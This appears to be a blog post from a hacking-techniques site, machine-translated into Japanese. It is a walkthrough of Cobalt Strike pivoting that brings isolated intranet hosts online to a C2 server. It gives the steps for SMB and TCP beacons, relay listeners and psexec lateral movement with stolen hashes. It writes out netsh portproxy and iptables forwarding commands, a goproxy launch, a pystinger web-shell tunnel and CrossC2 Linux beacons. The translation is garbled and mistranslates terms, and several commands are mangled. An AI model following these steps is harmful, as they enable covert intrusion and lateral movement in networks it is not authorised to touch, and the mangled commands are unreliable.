Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86376298

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x01トランスファーマシンがあります

トランスファーマシンがあり、このマシンはネットワークから外れており、これが最も一般的な状況です。

多くの場合、複数のネットワークカードを備えたエッジマシンを取得し、イントラネットマシンはネットワークを離れません。この場合、このエッジマシンを使用して転送してオンラインになります。

トポロジーは、ほぼ次の:です

image-20220516141642261.png

オンライン方法1:SMBビーコン

はじめに

公式ウェブサイトはじめに:SMBビーコンは、親のビーコンを介して通信するために名前付きパイプを使用します。 2つのビーコンが接続されると、子供のビーコンは親のビーコンからタスクを取得し、それを送信します。

接続されたビーコンは通信にパイプという名前のWindowsを使用しているため、このトラフィックはSMBプロトコルにカプセル化されているため、SMBビーコンは比較的隠されており、ファイアウォールを囲むときに奇跡的に機能する可能性があります。

image.png

を使用しています

このビーコンでは、SMBビーコンを持つホストがポート445で接続を受け入れる必要があります。SMBビーコン法を導き出しました。

または、ビーコンでコマンドスポーンSMBを使用します(SMBは私のSMBリスナー名です)

image-20220421232107035.png

プラグインを使用するか、独自のポートでイントラネットマシンをスキャンします

image-20220421234112584.png

表示してターゲットを選択します

image-20220421234143265.png

PSEXECの使用

image-20220421234333884.png

ハッシュを選択し、SMBリスナーと対応するセッションを選択します

image-20220421234419445.png

オンラインになります

image-20220422000337348.png

image-20220422000428622.png

実行が成功した後、キャラクター∞∞は導出されたSMBビーコンである外部で見ることができます。

現在接続されています。LinkIPコマンドを使用してリンクするか、IPコマンドをリンクしてビーコンで切断できます。

image-20220422000410651.png

image-20220422000458483.png

この種のビーコンは、イントラネットの水平浸透に多く使用されています。イントラネット環境では、IPC $によって生成されたSMBビーコンを使用して実行のためにターゲットホストにアップロードできますが、ターゲットホストはオンラインで直接行われません。リンクコマンド(リンクIP)を使用して接続する必要があります。

オンライン方法2:リスナーを転送(逆TCPビーコン)

実際、それはメソッドに似ています

image-20220422000759017.png

以下は自動的に構成されます

image-20220422000840172.png

次に、上記の方法と同様に、イントラネットホストを見つけてアカウントのパスワードを知っていて、水平方向にpsexecを渡すには、トランジットリスナーを選択します

image-20220422001158730.png

image-20220422001452245.png

image-20220422000337348.png

オンライン方法3:HTTPプロキシ

トランジットマシンはオンラインである必要はありません

GoProxy Projectをエージェントとして使用します。プロジェクトアドレス:

https://github.com/snail007/goproxy

プロセス:1。proxy.exeをWebサーバー(エッジホスト)にアップロードし、ポート8080でHTTPプロキシを有効にします

c: \ proxy.exe http -t tcp -p '0.0.0:8080' - daemon

2。NetSHコマンドを使用してトラフィックをリダイレクトして、イントラネットIP 192.168.111.131のポート822にアクセスします(未使用のポートである必要があります。そうでなければ失敗します)

NetshインターフェイスPortProxy Add v4tov4 shisteraddress=192.168.111.131 listenport=822 connectAddress=192.168.1.88 connectport=8080

image-20220516145111513.png

3.リスナーを作成し、次のように構成します

image-20220516163325095.png

4.雄弁なペイロードを生成し、ビジネスサーバーで実行し、オンラインで正常に進む

image-20220516163441748.png

接続プロセス

192.168.111.236→192.168.111.131:822→192.168.1.88:8080→C2(192.168.1.89)

オンライン方法4、TCPビーコン(フォワード)

フォワード接続はSMBビーコンに似ています。親のビーコンサムのビーコンも必要であり、TCPビーコンはコバルトストライクから派生したほとんどのアクションと互換性があります。一部を除いて

明示的なステージャーを必要とするユーザー駆動型の攻撃(たとえば、攻撃→パッケージ、攻撃→Webドライブバイ)。テスト:

TCPビーコンを生成します

image-20220424145301486.png

このビーコンを使用して、トロイの木馬を雄弁に生成します。

image-20220424145438941.png

ターゲットマシンにアップロードして実行します。

image-20220424150129703.png

Connect [IPアドレス] [ポート]コマンドを使用して、トランジットマシンのビーコンに接続してオンラインになります。

image-20220424150307350.png

ビーコンリンクを破壊するには、親または子セッションのコンソールで[IPアドレス] [IPアドレス] [セッションPID]を使用します。その後、同じホスト(または他のホスト)からTCPビーコンに再接続できます。

image-20220424150527311.png

オンライン方法5。Pystingerを使用してプロキシ転送

Pystingerの詳細な使用次の章を参照してください。簡単なデモは次のとおりです。

一般に、Pystingerはこのシナリオでは使用されません

テスト環境:攻撃航空機Kali:192.168.1.35

Webサーバー:192.168.1.70、192.168.111.129

ビジネスサーバー:192.168.111.236

プロセス:1。proxy.phpをWebサーバーWebサイトディレクトリにアップロードし、正常にアクセスするときにUTF-8に戻ります

Webサーバーの外部ネットワークIPは192.168.1.70です

image-20220517181300013.png

stinger_server.exeをアップロードして実行します

Stinger_server.exe 0.0.0.0を開始します

攻撃航空機で実行する(192.168.1.89)

./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000

この時点で、60020ポートオブザWebサーバーは60020 VPSポートに転送されました。

CSの設定を聞くために、HTTPホストはトランジットマシンのイントラネットIPであり、ポートは60020です。

image-20220517181223593.png

psexecを使用して水平に移動し、リスナーをpystingerとして選択するか、ビジネスホストで実行するためにペイロードを直接生成し、ビジネスイントラネットホスト192.168.111.236を正常に起動できます。

image-20220517182051748.png

image-20220517181145075.png

サプリメント:トランスファーマシンはLinux

です

httpプロキシ(トランジットマシンはオンラインである必要はありません)

使用方法は、上記の方法3と同じです。 iptablesを使用して転送するだけです。

Echo 1/proc/sys/net/ipv4/ip_forward

iptables -a Prerouting -P TCP -D 192.168.111.131 - DPORT 822 -J DNAT-滞留192.168.1.88:8080

iptables -a posttrouting -p TCP -D 192.168.1.88 - DPORT 8080 -J SNAT - ソースへ192.168.111.131

テスト:トランスファーマシン(192.168.111.142)

image-20220423214555465.png

攻撃航空機

image-20220423222203087.png

雄弁なペイロードを生成し、ターゲットマシンで実行し、オンラインで正常に進む

image-20220423222359445.png

image-20220423222645751.png

接続プロセス:(再スクリーニングされた画像、ポート変更8080-8081)

image-20220423222847432.png

192.168.111.140→192.168.111.142:8080→192.168.111.142:8081→192.168.111.131:81(C2)(C2)

プロキシ転送にPystingerを使用します

上記の方法5と同様に、Pystinger接続を確立した後、ビジネスホストで実行するためのペイロードを直接生成し、ビジネスイントラネットホスト192.168.111.236を正常に起動できます。

Crossc2

ビーコンは他のマシンを介してLinuxマシンを直接起動できます

image-20220424110511841.png

Crossc2は、LinuxまたはMacOSマシンの起動に使用されます

プロジェクトアドレス:[対応するバージョンを必ずダウンロードしてください]

https://github.com/gloxec/crossc2

構成:

(ここでWindowsでTeamServerを実行しています)

image-20220517214639195.png

HTTPSリスナーを作成します。

image-20220517215034645.png

ペイロードを生成します

(他の方法でも可能です)

image-20220517215228811.png

image-20220424104455547.png

image-20220424104411307.png

生成できない場合は、コマンドラインで直接生成することもできます

image-20220517221232018.png

世代後、Linuxマシンにアップロードし、実行してからオンラインになります。

image-20220517221438333.png

image-20220517221454859.png

CrossC2Kitプラグインをインストールして、ビーコン機能を濃縮します

image-20220517222854932.png

image-20220517222935500.png

イントラネットマシンがCS:リレー付きLinuxマシンで起動された後、上記の方法を使用してイントラネットマシンを起動できます。

TCPビーコン:image-20220517224718810.png

image-20220517224749945.png

ターゲットマシンにアップロードして実行します。

次に、Linuxビーコンの下に接続します。

image-20220517225035484.png

オンラインに行った後、それはブラックボックスになります、チェックインするだけです

上記の2つの方法を使用することをお勧めします。 DNSの

0x02エッジマシンには、ネットワークを出るためのDNSプロトコルのみがあります